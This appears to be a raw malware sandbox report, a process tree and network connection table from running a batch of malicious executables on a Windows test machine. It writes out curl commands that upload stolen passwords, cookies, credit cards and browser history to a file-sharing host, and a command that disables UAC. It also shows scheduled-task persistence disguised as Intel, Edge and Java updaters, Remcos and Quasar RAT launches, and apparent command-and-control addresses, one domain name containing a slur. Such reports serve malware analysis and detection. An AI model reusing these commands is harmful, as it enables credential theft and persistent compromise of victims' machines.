C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1956,13798904955917179525,4009292059293880977,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1984 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1956,13798904955917179525,4009292059293880977,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=2556 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1956,13798904955917179525,4009292059293880977,131072 --lang=es --service-sandbox-type=utility --mojo-platform-channel-handle=2692 /prefetch:8
C:\Users\Admin\Desktop\New Text Document mod.exse\a\client.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\client.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,13798904955917179525,4009292059293880977,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,13798904955917179525,4009292059293880977,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Windows\system32\mode.com
mode 65,10
C:\Users\Admin\Desktop\4363463463464363463463463\Files\RambledMime.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\RambledMime.exe"
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p24291711423417250691697322505 -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_7.zip -oextracted
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll, Main
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_6.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_5.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_4.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_3.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
C:\Windows\system32\attrib.exe
attrib +H "in.exe"
C:\Users\Admin\AppData\Local\Temp\main\in.exe
"in.exe"
C:\Windows\SYSTEM32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.0.0.1; del in.exe
C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_8376_133786560773964288\l4.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\l4.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1956,13798904955917179525,4009292059293880977,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=5088 /prefetch:8
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1956,13798904955917179525,4009292059293880977,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=5088 /prefetch:8
C:\Users\Admin\Desktop\New Text Document mod.exse\a\C1J7SVw.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\C1J7SVw.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe"
C:\Program Files\Windows Media Player\graph\graph.exe
"C:\Program Files\Windows Media Player\graph\graph.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\networkmanager.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\networkmanager.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Windows\system32\mode.com
mode 65,10
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p24291711423417250691697322505 -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_7.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_6.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_5.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_4.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_3.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
C:\Windows\system32\attrib.exe
attrib +H "in.exe"
C:\Users\Admin\AppData\Local\Temp\main\in.exe
"in.exe"
C:\Windows\SYSTEM32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.0.0.1; del in.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\dwVrTdy.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\dwVrTdy.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\RMX.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\RMX.exe"
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\ProgramData\Remcos\remcos.exe"
C:\Users\Admin\AppData\Local\Temp\shost.exe
shost.exe
C:\ProgramData\Remcos\remcos.exe
C:\ProgramData\Remcos\remcos.exe
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
\??\c:\program files (x86)\internet explorer\iexplore.exe
"c:\program files (x86)\internet explorer\iexplore.exe"
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Users\Admin\AppData\Local\Temp\shost.exe
shost.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /im firefox.exe /t /f >nul 2>&1"
C:\Windows\system32\taskkill.exe
taskkill /im firefox.exe /t /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckpasswords.txt" https://store4.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckpasswords.txt" https://store4.gofile.io/uploadFile
C:\Users\Admin\Desktop\New Text Document mod.exse\a\chrome11.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\chrome11.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp37FF.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp37FF.tmp.bat
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcookies.txt" https://store4.gofile.io/uploadFile"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\alexshlu.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\alexshlu.exe"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcookies.txt" https://store4.gofile.io/uploadFile
C:\Users\Admin\Desktop\New Text Document mod.exse\a\alexshlu.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\alexshlu.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcreditcards.txt" https://store4.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcreditcards.txt" https://store4.gofile.io/uploadFile
C:\Program Files\Windows Media Player\graph\graph.exe
"C:\Program Files\Windows Media Player\graph\graph.exe"
C:\Windows\System32\certutil.exe
"C:\Windows\System32\certutil.exe" -silent -importPFX -p "" -f "C:\Users\Admin\AppData\Local\Temp\tmp3F06.tmp"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckautofill.txt" https://store4.gofile.io/uploadFile"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\gU8ND0g.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\gU8ND0g.exe"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckautofill.txt" https://store4.gofile.io/uploadFile
C:\Windows\SYSTEM32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\SYSTEM32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /f /CREATE /TN "MicrosoftEdgeUpdateTaskMachineCoreSC" /TR "C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe" /SC MINUTE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.0.0.1; del gU8ND0g.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckhistory.txt" https://store4.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckhistory.txt" https://store4.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckparsedcookies.txt" https://store4.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckparsedcookies.txt" https://store4.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckbookmarks.txt" https://store4.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckbookmarks.txt" https://store4.gofile.io/uploadFile
C:\Users\Admin\Desktop\New Text Document mod.exse\a\t5abhIx.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\t5abhIx.exe"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\patcher.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\patcher.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c pHash.bat
C:\Users\Admin\Desktop\4363463463464363463463463\Files\spectrum.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\spectrum.exe"
C:\Windows\system32\curl.exe
curl -o "pHash" "http://144.172.71.105:1338/nova_flow/patcher.exe?hash"
C:\Users\Admin\Desktop\4363463463464363463463463\Files\xworm.exe
"C:\Users\Admin\Desktop\4363463463464363463463463\Files\xworm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 7784 -ip 7784
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7784 -s 236
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Java Updater" /sc ONLOGON /tr "C:\Users\Admin\Desktop\4363463463464363463463463\Files\spectrum.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\SubDir\Java Updater.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Java Updater.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Java Updater" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Java Updater.exe" /rl HIGHEST /f
C:\Users\Admin\Desktop\New Text Document mod.exse\a\888.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\888.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#vmm#>[System.Windows.Forms.MessageBox]::Show('Injection error! File must be started as Administrator!','','OK','Error')<#cuk#>;
C:\Users\Admin\Desktop\New Text Document mod.exse\a\vorpgkadeg.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\vorpgkadeg.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\boleto.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\boleto.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\piotjhjadkaw.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\piotjhjadkaw.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\krgawdtyjawd.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\krgawdtyjawd.exe"
C:\Program Files\Windows Media Player\graph\graph.exe
"C:\Program Files\Windows Media Player\graph\graph.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\jdrgsotrti.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\jdrgsotrti.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\kisteruop.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\kisteruop.exe"
C:\Windows\system32\calc.exe
calc.exe
C:\Users\Admin\Desktop\New Text Document mod.exse\a\vovdawdrg.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\vovdawdrg.exe"
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Users\Admin\Desktop\New Text Document mod.exse\a\mfcthased.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\mfcthased.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\kisloyat.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\kisloyat.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\daytjhasdawd.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\daytjhasdawd.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\ScreenUpdateSync.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\ScreenUpdateSync.exe"
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\vcredist_x86.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\vcredist_x86.exe"
C:\Windows\SysWOW64\msiexec.exe
msiexec /i vcredist.msi
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\jy.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\jy.exe"
C:\Users\Admin\AppData\Local\Temp\is-RH7SP.tmp\jy.tmp
"C:\Users\Admin\AppData\Local\Temp\is-RH7SP.tmp\jy.tmp" /SL5="$405D2,1888137,52736,C:\Users\Admin\Desktop\New Text Document mod.exse\a\jy.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\testingfile.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\testingfile.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 5844 -ip 5844
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5844 -s 1112
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Discord.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Discord.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "wod2" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Users\Admin\Desktop\New Text Document mod.exse\a\RuntimeBroker.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\RuntimeBroker.exe"
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe" /rl HIGHEST /f
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Loader.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Loader.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe
"C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "wod2" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\AppData\Roaming\Wave.exe
C:\Users\Admin\AppData\Roaming\Wave.exe
C:\Users\Admin\Windows.exe
C:\Users\Admin\Windows.exe
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\Desktop\New Text Document mod.exse\a\neofindsetup.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\neofindsetup.exe"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\System32\msiexec.exe" /I "C:\Program Files (x86)\Common Files\Wise Installation Wizard\WISAB9511B1EE52494CA9BAED6A1536F012_1_0_6_1940.MSI" WISE_SETUP_EXE_PATH="C:\Users\Admin\Desktop\New Text Document mod.exse\a\neofindsetup.exe"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding C5A61B1432C54B074EF4E967800944C6 C
C:\Users\Admin\Desktop\New Text Document mod.exse\a\KeePassRDP_v2.2.2.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\KeePassRDP_v2.2.2.exe"
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 8428 -ip 8428
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8428 -s 1300
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
Network
| US | 8.8.8.8:53 | 84.107.113.212.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.62.41.20.in-addr.arpa | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| DE | 167.71.56.116:22764 | tcp | |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 20.41.62.11:80 | g.ceipmsn.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 63.6.239.5.in-addr.arpa | udp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | bingwallpaper.microsoft.com | udp |
| US | 52.173.134.115:443 | bingwallpaper.microsoft.com | tcp |
| FR | 31.14.70.245:443 | store4.gofile.io | tcp |
| US | 8.8.8.8:53 | 57.110.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bingwallpaperimages.azureedge.net | udp |
| US | 13.107.246.64:443 | bingwallpaperimages.azureedge.net | tcp |
| TH | 103.230.121.81:30220 | iam.nigga.dad | tcp |
| FR | 89.156.24.108:1738 | tcp | |
| FR | 31.14.70.245:443 | store4.gofile.io | tcp |
| US | 8.8.8.8:53 | 64.246.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | vaniloin.fun | udp |
| US | 148.163.102.170:4782 | tcp | |
| US | 162.159.138.232:443 | discord.com | tcp |
| DE | 167.71.56.116:22764 | tcp | |
| US | 162.159.138.232:443 | discord.com | tcp |
| EG | 102.189.164.188:40500 | udp | |
| US | 8.8.8.8:53 | 188.164.189.102.in-addr.arpa | udp |
| KR | 152.67.212.187:443 | 152.67.212.187 | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| GB | 95.100.245.144:443 | www.microsoft.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 144.245.100.95.in-addr.arpa | udp |
| MX | 189.173.142.192:40500 | tcp | |
| DE | 167.71.56.116:22764 | tcp | |
| UZ | 213.230.99.119:40500 | udp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 8.8.8.8:53 | ip-api.com | udp |
| HK | 47.238.55.14:5555 | tcp | |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | 119.99.230.213.in-addr.arpa | udp |
| TH | 103.230.121.81:30220 | iam.nigga.dad | tcp |
| US | 8.8.8.8:53 | vaniloin.fun | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 162.159.138.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:80 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| DE | 167.71.56.116:22764 | tcp | |
| US | 8.8.8.8:53 | deauduafzgezzfgm.top | udp |
| RU | 185.215.113.66:80 | deauduafzgezzfgm.top | tcp |
| SA | 141.147.143.12:80 | 141.147.143.12 | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 12.143.147.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| UZ | 195.158.31.102:40500 | udp | |
| US | 8.8.8.8:53 | 102.31.158.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | scure2glbcubnk.es | udp |
| US | 104.21.82.246:443 | scure2glbcubnk.es | tcp |
| US | 8.8.8.8:53 | 246.82.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| IE | 185.166.142.23:443 | bitbucket.org | tcp |
| US | 148.163.102.170:4782 | tcp | |
| CA | 158.69.12.143:7771 | camp.zapto.org | tcp |
| US | 8.8.8.8:53 | bbuseruploads.s3.amazonaws.com | udp |
| US | 52.216.94.227:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 8.8.8.8:53 | 23.142.166.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.94.216.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | twizt.net | udp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| DE | 167.71.56.116:22764 | tcp | |
| RU | 31.41.244.9:80 | 31.41.244.9 | tcp |
| RU | 185.81.68.147:80 | 185.81.68.147 | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | 9.244.41.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| GB | 104.124.170.33:443 | steamcommunity.com | tcp |
| NL | 45.136.51.217:2222 | tcp | |
